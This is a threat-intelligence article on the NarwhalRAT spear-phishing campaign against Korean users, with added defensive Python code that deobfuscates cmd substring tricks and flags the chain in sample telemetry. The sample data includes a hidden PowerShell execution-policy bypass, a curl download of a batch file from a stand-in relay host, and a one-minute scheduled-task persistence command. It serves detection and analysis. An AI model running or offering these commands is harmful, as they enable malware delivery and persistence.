NarwhalRAT Malware Targets Korean Users via Spear-Phishing and Python Loader
A spear-phishing campaign abuses LNK files, PowerShell, and a Python loader to deploy the NarwhalRAT remote access trojan against Korean users.

A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. The threat actors use innocent-looking shortcut files, built-in Windows tools, and a Python payload run by a legitimately downloaded Python interpreter to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how well it blends into normal system activity, which makes it hard to catch.
The infection begins with a spear-phishing email posing as an urgent security alert from the “Microsoft Account Team.” The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document. Analysts at Genians Security Center said in a report shared with Cyber Security News that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026.
Researchers named the malware NarwhalRAT after the string “naverwhale” found inside its code, which they believe is an attempt to masquerade as Naver Whale, a popular browser in South Korea. Several behaviors confirm the Korean targeting: NarwhalRAT uses “naverwhale” as its working directory name and sets the Hidden and System attributes on that folder to keep it out of plain sight, and it handles KakaoTalk window identifiers as a separate case during data collection.
The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder. When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment-variable substring substitution (the %VAR:~start,length% syntax) to hide the real commands, rebuilding strings like “powershell” and “curl.exe” at runtime from slices of environment-variable values so that neither string appears literally in the file and static signatures miss it.
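The substring trick described above, as an added example that is not code from the article or from Genians: a small Python deobfuscator implementing cmd.exe's %VAR:~start,len% rules, run over a constructed command line built against stock Windows environment-variable values. The variable values, the user profile path and the obfuscated string are assumptions chosen to illustrate the technique; the expansion rules themselves are the ones documented by `set /?`.

```python
import re
from typing import Dict, Optional

# cmd.exe %VAR:~start,len% expansion, as documented by `set /?`:
#   start < 0   -> offset counted from the end of the value
#   len omitted -> through the end of the value
#   len < 0     -> stop that many characters before the end
SUBSTR_RE = re.compile(
    r"%(?P<name>[A-Za-z_][A-Za-z0-9_()]*)"
    r"(?::~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?)?%"
)


def cmd_substring(value: str, start: int, length: Optional[int] = None) -> str:
    """Apply cmd.exe's ~start,len rules to an already-expanded variable value."""
    if start < 0:
        start = max(len(value) + start, 0)
    if length is None:
        end = len(value)
    elif length < 0:
        end = len(value) + length
    else:
        end = start + length
    return value[start:end]  # an empty slice when start is past the end, as in cmd


def expand_cmd_line(line: str, env: Dict[str, str]) -> str:
    """Expand %VAR% and %VAR:~s,l% references the way cmd.exe does at parse time.

    Variable names are case-insensitive. A reference to an undefined variable is
    left in place, which is what cmd.exe does on an interactive or LNK command line.
    """
    lookup = {k.lower(): v for k, v in env.items()}

    def repl(m: "re.Match[str]") -> str:
        value = lookup.get(m.group("name").lower())
        if value is None:
            return m.group(0)
        if m.group("start") is None:
            return value
        length = m.group("len")
        return cmd_substring(value, int(m.group("start")),
                             None if length is None else int(length))

    return SUBSTR_RE.sub(repl, line)


def count_substring_refs(line: str) -> int:
    """Triage heuristic: how many ~start,len slices a command line carries.
    Legitimate scripts rarely need more than one or two."""
    return sum(1 for m in SUBSTR_RE.finditer(line) if m.group("start") is not None)


# Constructed environment (assumption: Windows default values on a stock install;
# the "user" profile name is invented).
ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PROGRAMFILES": r"C:\Program Files",
    "PUBLIC": r"C:\Users\Public",
    "TEMP": r"C:\Users\user\AppData\Local\Temp",
    "PSModulePath": r"C:\Program Files\WindowsPowerShell\Modules;"
                    r"C:\Windows\system32\WindowsPowerShell\v1.0\Modules",
}

# Constructed command line in the style the article describes: "powershell" and
# "curl.exe" never appear as literals; every fragment is a slice of a standard
# environment variable.
OBFUSCATED = (
    "%TEMP:~-1,1%%PROGRAMFILES:~5,1%%COMSPEC:~8,1%%COMSPEC:~15,1%"
    "%PROGRAMFILES:~4,1%%COMSPEC:~9,1%%PSModulePath:~30,1%%COMSPEC:~15,1%"
    "%PUBLIC:~12,1%%PUBLIC:~12,1% -ep bypass -w hidden -c "
    "%COMSPEC:~20,1%%PUBLIC:~10,1%%PROGRAMFILES:~4,1%%PUBLIC:~12,1%%COMSPEC:~-4%"
)

if __name__ == "__main__":
    print(count_substring_refs(OBFUSCATED), "substring references")
    print(expand_cmd_line(OBFUSCATED, ENV))
```

count_substring_refs is the cheap detection hook: a command line extracted from an LNK or seen on a cmd.exe process that carries more than a couple of ~start,len slices deserves a closer look, and running expand_cmd_line over it during triage reveals the real command without executing anything.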
After deobfuscation, the LNK file launches PowerShell with the execution policy bypassed and uses a copy of curl.exe to download two files from the relay server. The first is a decoy HWP document, opened so the victim sees what they expected; the second is a batch script named KHjWFcuS.bat that performs the next-stage installation in a hidden window. This reliance on tools already present on the system is living-off-the-land (LotL) tradecraft. The batch file downloads the official Python embeddable package so the activity resembles a normal software installation, and renames pythonw.exe to usersscreen.exe; pythonw.exe is the GUI-subsystem build of the interpreter, so no console window ever appears.
For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” that runs at one-minute intervals, a name chosen to resemble a legitimate Microsoft task and escape administrative scrutiny. A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code wrapping a Base64-encoded payload. Once that payload is decoded and executed in memory rather than dropped to disk, NarwhalRAT reveals itself as a fully featured remote access trojan. It first checks for virtual machine environments including VMware, VirtualBox, and Parallels Desktop to avoid sandbox analysis, a tactic typical of APT-level malware.
The RAT's command handler dispatches on more than 30 command prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes. Keystroke data is buffered locally and transmitted in batches, reducing the chance of real-time detection. From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse of LNK files and PowerShell, and security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.
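To make the persistence mechanism and the detection guidance in the two paragraphs above concrete, here is an added Python example that is not code from the article or from Genians: a handful of behavioral rules run over constructed Sysmon-style process-creation and image-load events modeled on the described chain. PIDs, file paths, the relay URL and the exact schtasks command line are assumptions; the one-minute schedule, the task name, usersscreen.exe, KHjWFcuS.bat and AccountConfig.cat come from the report. The last rule is one way to catch a renamed pythonw.exe: whatever the interpreter is called, it still loads python3*.dll.

```python
import ntpath
import re
from typing import Any, Callable, Dict, List, Optional, Tuple

Event = Dict[str, Any]

# Constructed telemetry approximating the chain in the article (all values invented
# except the task name and the usersscreen.exe / KHjWFcuS.bat / AccountConfig.cat names).
EVENTS: List[Event] = [
    {"type": "process_create", "pid": 4100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c "%PSModulePath:~24,10% -ep bypass -w hidden'
                     r' -f %PUBLIC:~0,2%%PUBLIC:~2%\stage.ps1"'},
    {"type": "process_create", "pid": 4104, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"PowerShell -ep bypass -w hidden -f C:\Users\Public\stage.ps1"},
    {"type": "process_create", "pid": 4108,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\Libraries\curl.exe",   # the copied curl, not the built-in one
     "command_line": r"curl.exe -s -o C:\Users\Public\Libraries\KHjWFcuS.bat http://relay.invalid/KHjWFcuS.bat"},
    {"type": "process_create", "pid": 4112, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /f /sc minute /mo 1 /tn MicrosoftUserInterfacePicturesUpdateTackMachine'
                     r' /tr "C:\Users\user\AppData\Local\Microsoft\usersscreen.exe'
                     r' C:\Users\user\AppData\Local\Microsoft\AccountConfig.cat"'},
    {"type": "image_load", "pid": 4120,
     "image": r"C:\Users\user\AppData\Local\Microsoft\usersscreen.exe",
     "image_loaded": r"C:\Users\user\AppData\Local\Microsoft\python3.dll"},
    # Benign noise that the rules must not flag: the built-in curl and a normal interpreter.
    {"type": "process_create", "pid": 5000, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe", "command_line": "curl.exe -I https://example.com"},
    {"type": "image_load", "pid": 5004, "image": r"C:\Program Files\Python312\pythonw.exe",
     "image_loaded": r"C:\Program Files\Python312\python312.dll"},
]

SUBSTR_RE = re.compile(r"%[A-Za-z_][A-Za-z0-9_()]*:~-?\d+(?:,-?\d+)?%")
PS_BYPASS_RE = re.compile(r"-e[a-z]*\s+bypass", re.I)      # -ep / -ExecutionPolicy Bypass
PS_HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)      # -w / -WindowStyle Hidden
MINUTE_RE = re.compile(r"/sc\s+minute\s+/mo\s+1\b", re.I)  # schtasks one-minute repetition
TASK_ACTION_RE = re.compile(r'/tr\s+"([^"]+)"', re.I)
PYTHON_DLL_RE = re.compile(r"python3\d*\.dll$", re.I)
SYSTEM32 = "c:\\windows\\system32\\"


def _base(path: str) -> str:
    return ntpath.basename(path).lower()   # ntpath splits on backslashes on any host OS


def rule_cmd_substring_obfuscation(ev: Event) -> Optional[str]:
    if ev["type"] != "process_create":
        return None
    n = len(SUBSTR_RE.findall(ev["command_line"]))
    return f"{n} %VAR:~start,len% expansions in command line" if n >= 3 else None


def rule_powershell_bypass_hidden(ev: Event) -> Optional[str]:
    if ev["type"] != "process_create" or _base(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    cl = ev["command_line"]
    if PS_BYPASS_RE.search(cl) and PS_HIDDEN_RE.search(cl):
        return "execution policy bypass combined with a hidden window"
    return None


def rule_curl_outside_system32(ev: Event) -> Optional[str]:
    if ev["type"] != "process_create" or _base(ev["image"]) != "curl.exe":
        return None
    if not ntpath.normcase(ev["image"]).startswith(SYSTEM32):
        return f"curl.exe running from {ev['image']}"
    return None


def rule_schtasks_persistence(ev: Event) -> Optional[str]:
    if ev["type"] != "process_create" or _base(ev["image"]) != "schtasks.exe":
        return None
    cl = ev["command_line"]
    if "/create" not in cl.lower():
        return None
    reasons = []
    if MINUTE_RE.search(cl):
        reasons.append("one-minute repetition")
    m = TASK_ACTION_RE.search(cl)
    if m and "\\users\\" in m.group(1).lower():
        reasons.append(f"action under a user profile: {m.group(1)}")
    return "; ".join(reasons) or None


def rule_renamed_python(ev: Event) -> Optional[str]:
    if ev["type"] != "image_load" or not PYTHON_DLL_RE.search(_base(ev["image_loaded"])):
        return None
    if _base(ev["image"]).startswith("python"):
        return None   # normally named interpreter; extend with an allow-list of known embedders
    return f"{_base(ev['image'])} loaded {_base(ev['image_loaded'])}: renamed Python interpreter"


RULES: Dict[str, Callable[[Event], Optional[str]]] = {
    "cmd_substring_obfuscation": rule_cmd_substring_obfuscation,
    "powershell_bypass_hidden": rule_powershell_bypass_hidden,
    "curl_outside_system32": rule_curl_outside_system32,
    "schtasks_persistence": rule_schtasks_persistence,
    "renamed_python_interpreter": rule_renamed_python,
}


def run_rules(events: List[Event]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) for every event that matches a rule."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                findings.append((name, ev["pid"], detail))
    return findings


if __name__ == "__main__":
    for name, pid, detail in run_rules(EVENTS):
        print(f"[{name}] pid={pid}: {detail}")
```

Each rule on its own is noisy in a large estate (administrators copy curl, developers embed Python); their value is in co-occurrence on one host within a short window, which is the correlation an EDR rule or SIEM query should express. The constructed benign events at the end show the two false-positive cases the rules are written to exclude.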